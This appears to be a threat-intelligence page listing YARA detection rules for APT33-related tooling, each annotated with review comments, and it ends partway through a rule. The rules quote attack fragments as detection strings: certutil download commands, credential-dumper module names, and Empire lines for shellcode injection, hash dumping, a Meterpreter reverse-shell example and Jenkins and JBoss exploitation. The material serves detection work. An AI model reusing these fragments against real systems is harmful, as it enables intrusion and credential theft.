YARA rules for APT33
109 rules · scoped to actor · back to APT33
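YARA rules whose family, name, or description matches this actor or its tooling. Use these for binary-pattern hunts. Because the selection also matches on shared tooling, a hit from one of these rules identifies the tool or technique and is not by itself attribution to APT33.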
// Flags a batch script by fragments of its text; the meta block ties it to an NCSC alert.
// The five strings are anonymous ($), so the condition can only count them.
rule Batch_Script_To_Run_PsExec {
meta:
author = "NCSC"
description = "Detects malicious batch file from NCSC report"
reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
date = "2018/04/06"
hash = "b7d7c4bc8f9fd0e461425747122a431f93062358ed36ce281147998575ee1a18"
id = "1fbeeec8-a5bd-569e-b435-c7d82d32e47b"
strings:
$ = "Tokens=1 delims=" ascii
$ = "SET ws=%1" ascii
$ = "Checking %ws%" ascii
$ = "%TEMP%\\%ws%ns.txt" ascii
$ = "ps.exe -accepteula" ascii
condition:
// Any three of the five fragments. There is no filesize or file-type guard, so any
// scanned buffer that contains three of them matches, whatever its type or size.
// All strings are ascii only: a UTF-16 copy of the script would not match.
3 of them
}
// Matches the section banners and field labels of a system-information report.
// The description attributes that output format to the Casper malware; nothing in
// the rule itself refers to the actor this page is scoped to.
rule Casper_SystemInformation_Output {
meta:
description = "Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://goo.gl/VRJNLo"
date = "2015/03/06"
score = 70
id = "aaae200c-7ef1-52eb-be5b-36e0ad29ecef"
strings:
// No modifiers are given, so YARA treats each string as case-sensitive ASCII.
$a0 = "***** SYSTEM INFORMATION ******"
$a1 = "***** SECURITY INFORMATION ******"
$a2 = "Antivirus: "
$a3 = "Firewall: "
$a4 = "***** EXECUTION CONTEXT ******"
$a5 = "Identity: "
$a6 = "<CONFIG TIMESTAMP="
condition:
// All seven strings must be present; there is no filesize or header restriction.
all of them
}
// Flags small files that embed a certutil command line used to decode a payload
// (-decode) or to fetch one over HTTP (-urlcache -split -f http).
// certutil is a legitimate Windows tool, so this is a hunting signal (score 40),
// not proof of compromise.
rule Certutil_Decode_OR_Download {
meta:
description = "Certutil Decode"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Internal Research"
score = 40
date = "2017-08-29"
modified = "2026-04-01"
id = "63bdefd2-225a-56d5-b615-5e236c97f050"
strings:
// NOTE(review): as printed here $a1/$a2 and $a3/$a4 are byte-identical, which makes
// one of each pair redundant. Presumably the page rendering collapsed a whitespace
// variant; compare with the upstream copy of the rule before deploying.
$a1 = "certutil -decode " ascii wide
$a2 = "certutil -decode " ascii wide
$a3 = "certutil.exe -decode " ascii wide
$a4 = "certutil.exe -decode " ascii wide
$a5 = "certutil -urlcache -split -f http" ascii wide
$a6 = "certutil.exe -urlcache -split -f http" ascii wide
// False-positive filters. The hex pattern is "Root Entry" in UTF-16LE (final byte
// without its trailing 00); judging by the identifier it is meant to exclude MSI files.
$fp_msi = { 52 00 6F 00 6F 00 74 00 20 00 45 00 6E 00 74 00 72 00 79 }
$fp_doc = "https://docs.aws.amazon.com" ascii
condition:
// Size cap, at least one command-line string, and neither exclusion string present.
// Matching is case-sensitive: differently cased command lines are not covered.
filesize < 700KB
and 1 of ($a*)
and not 1 of ($fp*)
}
// Detects a PE that carries certutil's internal strings but is stored under a name
// that does not contain "certutil", i.e. a renamed copy of the utility.
// `filename` and `filepath` are external variables: the scanner has to define them
// (for the yara CLI, with -d), otherwise the rule fails to compile.
rule APT_Cloaked_CERTUTIL {
meta:
description = "Detects a renamed certutil.exe utility that is often used to decode encoded payloads"
author = "Florian Roth (Nextron Systems)"
reference = "Internal Research"
date = "2018-09-14"
modified = "2022-06-27"
id = "13943cda-6bb1-5c6c-8e55-e8d4bba1ffef"
strings:
$s1 = "-------- CERT_CHAIN_CONTEXT --------" fullword ascii
$s5 = "certutil.pdb" fullword ascii
$s3 = "Password Token" fullword ascii
condition:
// 0x5a4d is "MZ" read as a little-endian 16-bit value at offset 0 (PE/DOS header).
// `contains` is case-sensitive, hence the three spellings; other casings such as
// "CERTUTIL" are not excluded and a genuine certutil stored that way would match.
// The last clause skips copies under a \Bromium\ directory.
uint16(0) == 0x5a4d and all of them
and not filename contains "certutil"
and not filename contains "CertUtil"
and not filename contains "Certutil"
and not filepath contains "\\Bromium\\"
}
// Flags a small script that writes PEM certificate markers with echo redirection and
// then calls certutil -decode, the "binary disguised as a base64 certificate" drop.
rule Binary_Drop_Certutil {
meta:
description = "Drop binary as base64 encoded cert trick"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/9DNn8q"
date = "2015-07-15"
score = 70
id = "19791e51-d041-524d-80fa-9f3ec54eb084"
strings:
$s0 = "echo -----BEGIN CERTIFICATE----- >" ascii
$s1 = "echo -----END CERTIFICATE----- >>" ascii
// Only the "certutil -decode " spelling is covered; "certutil.exe -decode " does not
// contain this substring and would not satisfy $s2.
$s2 = "certutil -decode " ascii
condition:
// All three strings in a file under 10KB; larger droppers fall outside the rule.
filesize < 10KB and all of them
}
// Identifies the LaZagne credential-recovery tool by its own name plus the names of
// two Python modules found alongside it.
rule Lazagne_PW_Dumper {
meta:
description = "Detects Lazagne PW Dumper"
author = "Markus Neis / Florian Roth"
reference = "https://github.com/AlessandroZ/LaZagne/releases/"
date = "2018-03-22"
score = 70
id = "1904029e-9336-5278-ae2e-4bc853316600"
strings:
$s1 = "Crypto.Hash" fullword ascii
$s2 = "laZagne" fullword ascii
$s3 = "impacket.winregistry" fullword ascii
condition:
// With exactly three strings defined, "3 of them" is the same as "all of them".
// No header or filesize guard: scripts, bundled executables and dumps all qualify.
3 of them
}
// Detects LaZagne builds shipped as a Windows executable by call strings that name
// its per-application modules (opera, mozilla, chrome, outlook).
rule HKTL_Lazagne_PasswordDumper_Dec18_1 {
meta:
description = "Detects password dumper Lazagne often used by middle eastern threat groups"
author = "Florian Roth (Nextron Systems)"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
reference = "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group"
date = "2018-12-11"
score = 85
hash1 = "1205f5845035e3ee30f5a1ced5500d8345246ef4900bcb4ba67ef72c0f79966c"
hash2 = "884e991d2066163e02472ea82d89b64e252537b28c58ad57d9d648b969de6a63"
hash3 = "bf8f30031769aa880cdbe22bc0be32691d9f7913af75a5b68f8426d4f0c7be50"
id = "bae48a4d-33b6-55b9-abf5-daf87e5da9e9"
strings:
$s1 = "softwares.opera(" ascii
$s2 = "softwares.mozilla(" ascii
$s3 = "config.dico(" ascii
$s4 = "softwares.chrome(" ascii
$s5 = "softwares.outlook(" ascii
condition:
// "MZ" header, under 17000KB, and a single string is enough. The strings must be
// present in clear text, so a build that compresses them would not match.
uint16(0) == 0x5a4d and filesize < 17000KB and 1 of them
}
// Generic LaZagne detection based on fully qualified module paths from the tool's
// package tree (lazagne.*, creddump7.win32.*).
rule HKTL_Lazagne_Gen_18 {
meta:
description = "Detects Lazagne password extractor hacktool"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/AlessandroZ/LaZagne"
license = "https://creativecommons.org/licenses/by-nc/4.0/"
date = "2018-12-11"
score = 80
hash1 = "51121dd5fbdfe8db7d3a5311e3e9c904d644ff7221b60284c03347938577eecf"
id = "034ea6d8-f5cf-5664-9ff9-24d19403093d"
strings:
$x1 = "lazagne.config.powershell_execute(" ascii
$x2 = "creddump7.win32." ascii
$x3 = "lazagne.softwares.windows.hashdump" ascii
$x4 = ".softwares.memory.libkeepass.common(" ascii
condition:
// Any two of the four strings; no header or filesize guard, so the rule is not
// limited to executables.
2 of them
}
// Matches Empire's Invoke-BypassUAC.ps1 by exact source lines from the script.
// The strings are literal, case-sensitive and ascii only: re-encoded (UTF-16),
// reformatted or obfuscated copies of the script are not covered.
rule Empire_Invoke_BypassUAC {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-BypassUAC.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "ab0f900a6915b7497313977871a64c3658f3e6f73f11b03d2d33ca61305dc6a8"
id = "8454d929-e184-5be1-b61f-4dfa8f44bdda"
strings:
$s1 = "$WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory" fullword ascii
$s2 = "$proc = Start-Process -WindowStyle Hidden notepad.exe -PassThru" fullword ascii
$s3 = "$Payload = Invoke-PatchDll -DllBytes $Payload -FindString \"ExitThread\" -ReplaceString \"ExitProcess\"" fullword ascii
$s4 = "$temp = [System.Text.Encoding]::UNICODE.GetBytes($szTempDllPath)" fullword ascii
condition:
// Three of the four lines in a file under 1200KB.
filesize < 1200KB and 3 of them
}
// Matches Empire's server-side module message.py: two Python lines that assemble the
// PowerShell command plus two default values embedded in the module.
rule Empire_lib_modules_trollsploit_message {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file message.py"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "71f2258177eb16eafabb110a9333faab30edacf67cb019d5eab3c12d095655d5"
id = "cb0eee5a-c236-512e-8256-7411a7fb1fd5"
strings:
// NOTE(review): $s1 and $s2 look like generic option-handling code that other Empire
// modules may share; $s3/$s4 appear specific to this module. Confirm before relying
// on the rule name to identify the exact file.
$s1 = "script += \" -\" + str(option) + \" \\\"\" + str(values['Value'].strip(\"\\\"\")) + \"\\\"\"" fullword ascii
$s2 = "if option.lower() != \"agent\" and option.lower() != \"computername\":" fullword ascii
$s3 = "[String] $Title = 'ERROR - 0xA801B720'" fullword ascii
$s4 = "'Value' : 'Lost contact with the Domain Controller.'" fullword ascii
condition:
// Three of four strings in a file under 10KB.
filesize < 10KB and 3 of them
}
// Matches Empire's Persistence.psm1 by a help-example line, a comment line and one
// code line taken from the module.
rule Empire_Persistence {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file Persistence.psm1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "ae8875f7fcb8b4de5cf9721a9f5a9f7782f7c436c86422060ecdc5181e31092f"
id = "0f63b5f4-f933-5821-b0b0-50717e75f6d9"
strings:
// $s1 ends mid-token ("-V") and carries no fullword modifier; presumably the string
// was cut at a length limit when the rule was generated.
$s1 = "C:\\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -V" ascii
$s2 = "# Execute the following to remove the user-level persistent payload" fullword ascii
$s3 = "$PersistantScript = $PersistantScript.ToString().Replace('EXECUTEFUNCTION', \"$PersistenceScriptName -Persist\")" fullword ascii
condition:
// One string suffices under 108KB. $s1 and $s2 are help/comment text, so a copy with
// comments stripped can only match through $s3.
filesize < 108KB and 1 of them
}
// Matches Empire's server-side module portscan.py by the two Python lines that build
// the Invoke-PortScan PowerShell command.
rule Empire_portscan {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file portscan.py"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "b355efa1e7b3681b1402e22c58ce968795ef245fd08a0afb948d45c173e60b97"
id = "23a0f769-9155-5aa0-9200-2baf827bdda4"
strings:
$s1 = "script += \"Invoke-PortScan -noProgressMeter -f\"" fullword ascii
// Ends mid-token ("Out-Str") and has no fullword modifier.
$s2 = "script += \" | ? {$_.alive}| Select-Object HostName,@{name='OpenPorts';expression={$_.openPorts -join ','}} | ft -wrap | Out-Str" ascii
condition:
// Both strings in a file under 14KB.
filesize < 14KB and all of them
}
// Matches Empire's Invoke-Shellcode.ps1 by a usage example from its help text, a
// status-message line and the VirtualAllocEx call line including its trailing comment.
rule Empire_Invoke_Shellcode {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "fa75cfd57269fbe3ad6bdc545ee57eb19335b0048629c93f1dc1fe1059f60438"
id = "41788f71-cc99-50b3-bdc7-17b132ab2767"
strings:
// $s1 is documentation text (the address in it is the example's value, not an
// indicator) and ends mid-token ("-Verbos").
$s1 = "C:\\PS> Invoke-Shellcode -ProcessId $Proc.Id -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 443 -Verbos" ascii
$s2 = "\"Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!\" ) )" fullword ascii
// $s3 includes the source comment, so it depends on comments being left in place.
$s3 = "$RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)" fullword ascii
condition:
// One string is enough in a file under 100KB.
filesize < 100KB and 1 of them
}
// Matches Empire's Write-HijackDll.ps1 by the lines that hold, decode and patch an
// embedded DLL.
rule Empire_Write_HijackDll {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file Write-HijackDll.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "155fa7168e28f15bb34f67344f47234a866e2c63b3303422ff977540623c70bf"
id = "6a80af21-fb01-5996-b14d-44ff55b7fb3e"
strings:
$s1 = "$DllBytes = Invoke-PatchDll -DllBytes $DllBytes -FindString \"debug.bat\" -ReplaceString $BatchPath" fullword ascii
// The value starts with "TVqQ", the base64 form of the bytes 4D 5A 90 ("MZ" header),
// i.e. the beginning of a base64-encoded PE embedded in the script.
$s2 = "$DllBytes32 = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAA4fug4AtAnNIbgBTM0hVGhpcyBw" ascii
$s3 = "[Byte[]]$DllBytes = [Byte[]][Convert]::FromBase64String($DllBytes32)" fullword ascii
condition:
// Two of three strings in a file under 500KB.
filesize < 500KB and 2 of them
}
// Matches Empire's server-side module skeleton_key.py, which wraps the Mimikatz
// misc::skeleton command (see $s1 and $s3).
rule Empire_skeleton_key {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file skeleton_key.py"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "3d02f16dcc38faaf5e97e4c5dbddf761f2816004775e6af8826cde9e29bb750f"
id = "d508e09e-13e8-5866-bb5b-0d886f960bb5"
strings:
$s1 = "script += \"Invoke-Mimikatz -Command '\\\"\" + command + \"\\\"';\"" fullword ascii
$s2 = "script += '\"Skeleton key implanted. Use password \\'mimikatz\\' for access.\"'" fullword ascii
$s3 = "command = \"misc::skeleton\"" fullword ascii
$s4 = "\"ONLY APPLICABLE ON DOMAIN CONTROLLERS!\")," fullword ascii
condition:
// Two of four strings in a file under 6KB. This targets the Python module on the
// Empire server side; the PowerShell sent to a target is built at run time.
filesize < 6KB and 2 of them
}
// Matches Empire's server-side module invoke_wmi.py by Python lines that look up
// stored credentials and build the Invoke-Wmi PowerShell command.
rule Empire_invoke_wmi {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file invoke_wmi.py"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "a914cb227f652734a91d3d39745ceeacaef7a8b5e89c1beedfd6d5f9b4615a1d"
id = "1e1d1e71-6ea9-500a-b8b8-c48a64bc2b54"
strings:
// NOTE(review): $s1 reads like a generic credential-lookup line that other Empire
// modules may share; verify before treating a hit as this exact file.
$s1 = "(credID, credType, domainName, userName, password, host, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]" fullword ascii
$s2 = "script += \";'Invoke-Wmi executed on \" +computerNames +\"'\"" fullword ascii
// Ends mid-token ("System.Man") and has no fullword modifier.
$s3 = "script = \"$PSPassword = \\\"\"+password+\"\\\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Man" ascii
condition:
// Two of three strings in a file under 20KB.
filesize < 20KB and 2 of them
}
// Matches Empire's Invoke-MetasploitPayload.ps1 by two source lines that set up a
// hidden PowerShell child process running a download cradle.
rule Empire_Invoke_MetasploitPayload {
meta:
description = "Detects Empire component - file Invoke-MetasploitPayload.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "a85ca27537ebeb79601b885b35ddff6431860b5852c6a664d32a321782808c54"
id = "608c30b0-826a-55b1-afb8-756b476d6b55"
strings:
$s1 = "$ProcessInfo.Arguments=\"-nop -c $DownloadCradle\"" fullword ascii
$s2 = "$PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'" fullword ascii
condition:
// uint16(0) is little-endian: 0x7566 means the file starts with the bytes 66 75 ("fu").
// Left branch: that prefix, under 9KB, and either string.
// Right branch: both strings anywhere, with no size or header limit.
// A file with a BOM or any leading bytes before "fu" can only match via the right branch.
( uint16(0) == 0x7566 and filesize < 9KB and 1 of them ) or all of them
}
// Matches Empire's Exploit-Jenkins.ps1 by the lines that URL-encode a command and
// post it to a Jenkins /script endpoint.
rule Empire_Exploit_Jenkins {
meta:
description = "Detects Empire component - file Exploit-Jenkins.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "a5182cccd82bb9984b804b365e07baba78344108f225b94bd12a59081f680729"
id = "f2162783-34cd-5db4-bd1c-6c58feb92e77"
strings:
$s1 = "$postdata=\"script=println+new+ProcessBuilder%28%27\"+$($Cmd)+\"" ascii
$s2 = "$url = \"http://\"+$($Rhost)+\":\"+$($Port)+\"/script\"" fullword ascii
$s3 = "$Cmd = [System.Web.HttpUtility]::UrlEncode($Cmd)" fullword ascii
condition:
// 0x6620 read little-endian is the byte pair 20 66 (space, "f") at offset 0.
// Left branch: that prefix, under 7KB, any one string. Right branch: all three
// strings anywhere, regardless of size or prefix.
( uint16(0) == 0x6620 and filesize < 7KB and 1 of them ) or all of them
}
// Matches Empire's Get-SecurityPackages.ps1 by two lines that define an
// SSPI.SECPKG_FLAG enum through reflection.
rule Empire_Get_SecurityPackages {
meta:
description = "Detects Empire component - file Get-SecurityPackages.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "5d06e99121cff9b0fce74b71a137501452eebbcd1e901b26bde858313ee5a9c1"
id = "a109eda1-a26d-5cf6-b6b5-1a1a1e770a0a"
strings:
$s1 = "$null = $EnumBuilder.DefineLiteral('LOGON', 0x2000)" fullword ascii
$s2 = "$EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])" fullword ascii
condition:
// 0x7566 read little-endian = bytes 66 75 ("fu") at offset 0.
// Left branch: prefix + under 20KB + either string. Right branch: both strings
// anywhere, without size or prefix limits.
( uint16(0) == 0x7566 and filesize < 20KB and 1 of them ) or all of them
}
// Matches Empire's Invoke-PowerDump.ps1 by lines from its hash-decryption code
// (boot key, RID, RC4 key derived with MD5).
rule Empire_Invoke_PowerDump {
meta:
description = "Detects Empire component - file Invoke-PowerDump.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "095c5cf5c0c8a9f9b1083302e2ba1d4e112a410e186670f9b089081113f5e0e1"
id = "d1082a4e-d458-57fb-b332-7c775c8ef2dd"
strings:
$x16 = "$enc = Get-PostHashdumpScript" fullword ascii
$x19 = "$lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;" fullword ascii
$x20 = "$rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);" fullword ascii
condition:
// 0x2023 read little-endian = bytes 23 20 ("# "), i.e. the file opens with a comment.
// Left branch: that prefix, under 60KB, any one string. Right branch: all three
// strings anywhere, regardless of size or prefix.
( uint16(0) == 0x2023 and filesize < 60KB and 1 of them ) or all of them
}
// Matches Empire's Install-SSP.ps1 by a single usage-example string that installs
// mimilib.dll as a security support provider.
rule Empire_Install_SSP {
meta:
description = "Detects Empire component - file Install-SSP.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "7fd921a23950334257dda57b99e03c1e1594d736aab2dbfe9583f99cd9b1d165"
id = "06bbdcc5-c48b-5753-88a2-5c962d1b986f"
strings:
$s1 = "Install-SSP -Path .\\mimilib.dll" fullword ascii
condition:
// NOTE(review): only one string is defined, so "1 of them" and "all of them" are the
// same test. The right-hand side of the "or" therefore matches whenever $s1 is
// present, and the "fu" prefix (0x7566) and 20KB limit never restrict the result.
( uint16(0) == 0x7566 and filesize < 20KB and 1 of them ) or all of them
}
// Matches Empire's Invoke-ShellcodeMSIL.ps1 by a variable reference, two byte-array
// literals and the reflective method invocation line.
rule Empire_Invoke_ShellcodeMSIL {
meta:
description = "Detects Empire component - file Invoke-ShellcodeMSIL.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "9a9c6c9eb67bde4a8ce2c0858e353e19627b17ee2a7215fa04a19010d3ef153f"
id = "06011b51-bad7-5656-ac37-e49f9b6d0498"
strings:
$s1 = "$FinalShellcode.Length" fullword ascii
$s2 = "@(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)" fullword ascii
$s3 = "@(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57," fullword ascii
$s4 = "$TargetMethod.Invoke($null, @(0x11112222)) | Out-Null" fullword ascii
condition:
// 0x7566 read little-endian = bytes 66 75 ("fu") at offset 0.
// Left branch: prefix + under 30KB + any one string (including the short $s1).
// Right branch: all four strings anywhere, without size or prefix limits.
( uint16(0) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
}
// Matches Empire's PowerUp.ps1 by one source line that builds an appcmd.exe
// "list apppool" command.
rule HKTL_Empire_PowerUp {
meta:
description = "Detects Empire component - file PowerUp.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "ad9a5dff257828ba5f15331d59dd4def3989537b3b6375495d0c08394460268c"
id = "e79d093e-7481-52a3-a350-4d1b6d8955cd"
strings:
$x2 = "$PoolPasswordCmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool" fullword ascii
condition:
// NOTE(review): only one string is defined, so "all of them" equals "1 of them" and
// the right-hand branch matches whenever $x2 is present. The "<#" prefix check
// (0x233c = bytes 3C 23) and the 2000KB limit do not narrow the result.
( uint16(0) == 0x233c and filesize < 2000KB and 1 of them ) or all of them
}
// Matches Empire's Get-GPPPassword.ps1 by lines that search SYSVOL for XML files and
// decode a cpassword value.
rule Empire_Get_GPPPassword {
meta:
description = "Detects Empire component - file Get-GPPPassword.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "55a4519c4f243148a971e4860225532a7ce730b3045bde3928303983ebcc38b0"
id = "7791b009-19d3-5d08-8ef7-4723d28830ed"
strings:
$s1 = "$Base64Decoded = [Convert]::FromBase64String($Cpassword)" fullword ascii
$s2 = "$XMlFiles += Get-ChildItem -Path \"\\\\$DomainController\\SYSVOL\" -Recurse" ascii
$s3 = "function Get-DecryptedCpassword {" fullword ascii
condition:
// 0x7566 read little-endian = bytes 66 75 ("fu") at offset 0.
// Left branch: prefix + under 30KB + any one string. Right branch: all three
// strings anywhere, without size or prefix limits.
( uint16(0) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
}
// Matches Empire's Invoke-SmbScanner.ps1 by a host-reachability line and a line that
// adds a 'Password' property to the output object.
rule Empire_Invoke_SmbScanner {
meta:
description = "Detects Empire component - file Invoke-SmbScanner.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "9a705f30766279d1e91273cfb1ce7156699177a109908e9a986cc2d38a7ab1dd"
id = "63cd048b-04fd-5b4f-9d4d-3a001c31b4df"
strings:
// The trailing space inside $s1 is part of the pattern; keep it when copying the rule.
// NOTE(review): a Test-Connection line like this could appear in unrelated admin
// scripts; in the left branch below it is enough on its own.
$s1 = "$up = Test-Connection -count 1 -Quiet -ComputerName $Computer " fullword ascii
$s2 = "$out | add-member Noteproperty 'Password' $Password" fullword ascii
condition:
// 0x7566 read little-endian = bytes 66 75 ("fu") at offset 0.
// Left branch: prefix + under 10KB + either string. Right branch: both strings
// anywhere, without size or prefix limits.
( uint16(0) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
}
// Matches Empire's Exploit-JBoss.ps1 by its function name, URL-building line,
// jmx-console request path, an author URL and a help-text sentence.
rule Empire_Exploit_JBoss {
meta:
description = "Detects Empire component - file Exploit-JBoss.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "9ea3e00b299e644551d90bbee0ce3e4e82445aa15dab7adb7fcc0b7f1fe4e653"
id = "a9c75cf5-9469-5a45-b750-69728ed0069f"
strings:
$s1 = "Exploit-JBoss" fullword ascii
$s2 = "$URL = \"http$($SSL)://\" + $($Rhost) + ':' + $($Port)" ascii
$s3 = "\"/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service" ascii
$s4 = "http://blog.rvrsh3ll.net" fullword ascii
$s5 = "Remote URL to your own WARFile to deploy." fullword ascii
condition:
// 0x7566 read little-endian = bytes 66 75 ("fu") at offset 0.
// Left branch: prefix + under 10KB + any one string. Right branch: all five
// strings anywhere, without size or prefix limits.
( uint16(0) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
}
// Matches Empire's dumpCredStore.ps1 by its P/Invoke declaration for CredReadW in
// Advapi32.dll, an error-message line and a CredRead call.
rule Empire_dumpCredStore {
meta:
description = "Detects Empire component - file dumpCredStore.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "c1e91a5f9cc23f3626326dab2dcdf4904e6f8a332e2bce8b9a0854b371c2b350"
id = "cdb87ed4-fa90-5724-b37d-97cf8e4b8326"
strings:
// NOTE(review): a CredReadW DllImport declaration can also appear in legitimate
// credential-manager code; in the left branch below $x1 is enough on its own.
$x1 = "[DllImport(\"Advapi32.dll\", SetLastError = true, EntryPoint = \"CredReadW\"" ascii
$s12 = "[String] $Msg = \"Failed to enumerate credentials store for user '$Env:UserName'\"" fullword ascii
$s15 = "Rtn = CredRead(\"Target\", CRED_TYPE.GENERIC, out Cred);" fullword ascii
condition:
// 0x233c read little-endian = bytes 3C 23 ("<#"), a PowerShell block-comment opener.
// Left branch: that prefix, under 40KB, any one string. Right branch: all three
// strings anywhere, without size or prefix limits.
( uint16(0) == 0x233c and filesize < 40KB and 1 of them ) or all of them
}
// Matches Empire's Invoke-EgressCheck.ps1 by a single call line of its egress helper.
rule Empire_Invoke_EgressCheck {
meta:
description = "Detects Empire component - file Invoke-EgressCheck.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "e2d270266abe03cfdac66e6fc0598c715e48d6d335adf09a9ed2626445636534"
id = "21e09250-6853-5743-a6ef-aa6be8091d33"
strings:
